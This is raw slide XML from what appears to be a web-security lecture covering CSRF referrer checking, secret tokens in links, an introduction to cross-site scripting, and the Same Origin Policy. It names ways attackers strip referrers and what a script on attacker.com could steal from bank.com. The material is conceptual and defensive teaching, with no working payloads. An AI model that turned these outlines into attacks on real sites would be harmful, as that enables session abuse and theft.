                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="67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p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="677"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="6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0" animBg="1" advAuto="0"/>
      <p:bldP spid="676" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="677"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Problem: Referrer optional"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="543305">
              <a:defRPr sz="10416"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Problem: Referrer optional</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680" name="Not included by all browsers…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Not included by all browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Sometimes other legitimate reasons not to have it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Response: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>lenient referrer checking </a:t>
            </a:r>
            <a:endParaRPr i="1">
              <a:latin typeface="Helvetica"/>
              <a:ea typeface="Helvetica"/>
              <a:cs typeface="Helvetica"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Blocks requests with a bad referrer, but allows requests with no referrer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr i="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Missing referrer always harmless?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>No:</a:t>
            </a:r>
            <a:r>
              <a:t> attackers can </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>force the removal of referrer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Bounce</a:t>
            </a:r>
            <a:r>
              <a:t> user off of </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>ftp:</a:t>
            </a:r>
            <a:r>
              <a:t> page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Exploit browser vulnerability</a:t>
            </a:r>
            <a:r>
              <a:t> and remove it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Man-in-the-middle</a:t>
            </a:r>
            <a:r>
              <a:t> network attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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8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6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8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8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68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80">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680">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680">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68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0" build="p"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CSRF Protection: Secretized Links"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348666" y="625078"/>
            <a:ext cx="21456210" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="414781">
              <a:defRPr sz="7951"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr sz="9800" dirty="0"/>
              <a:t>CSRF Protection: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="9800" dirty="0" err="1"/>
              <a:t>Secretized</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="9800" dirty="0"/>
              <a:t> Links</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="683" name="Include a secret in every link/form…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Include a secret in every link/form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Checked by the server to assure referrer is valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Can use a hidden form field, custom HTTP header, or encode it directly in the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Must not be guessable value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Can be same as session id sent in cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Frameworks help</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Popular web frameworks embed a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>secret in every link automatically</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="http://website.com/doStuff.html?sid=81asf98as8eak"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6834695" y="11401917"/>
            <a:ext cx="10714610" cy="688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3600" u="sng">
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://website.com/doStuff.html?sid=81asf98as8eak</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8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6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6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6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83">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683">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="10" presetClass="entr" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="10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 grpId="0" build="p" animBg="1" advAuto="0"/>
      <p:bldP spid="684"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7CA54-9F65-E6EE-1CEE-70C3634A5E5B}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Shape 508">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586C9C43-91A1-BB5A-CE9F-E1CE8EA1FACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(XSS)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D85B47A-ECDB-C54B-8CF0-DF8029B58525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1506752661"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4131266" y="656793"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Dynamic web pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Shape 672"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="2837256"/>
            <a:ext cx="15609094" cy="2359439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="611187" indent="-611187" defTabSz="578358">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:defRPr sz="4950"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>eb pages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>often contain embedded</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, executed by the browser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673" name="Shape 673"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5115471" y="4789881"/>
            <a:ext cx="14153059" cy="52482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200">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>&lt;html&gt;&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>	Hello, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>		var a = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>		var b = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>		document.write(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“world: “</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>, a+b, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“&lt;/b&gt;”</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>	&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="674" name="pasted-image.tif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4699000" y="10282552"/>
            <a:ext cx="14986000" cy="11963401"/>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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2864005329"/>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 grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="674"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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>What could go wrong?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="686" name="Shape 686"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Browsers need to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>confine </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Javascript’s</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>A script on </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>should not be able to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Alter the layout of a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>web page</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Read keystrokes typed by the user while on a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>web page</a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Read cookies belonging to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3937097109"/>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0" build="p" bldLvl="5"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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Same Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="Shape 689"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Browsers provide isolation for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>avascript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> scripts via the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Same Origin Policy (SOP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Browser associates </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>web page elements</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Layout, cookies, events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>…with a given </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
          </a:p>
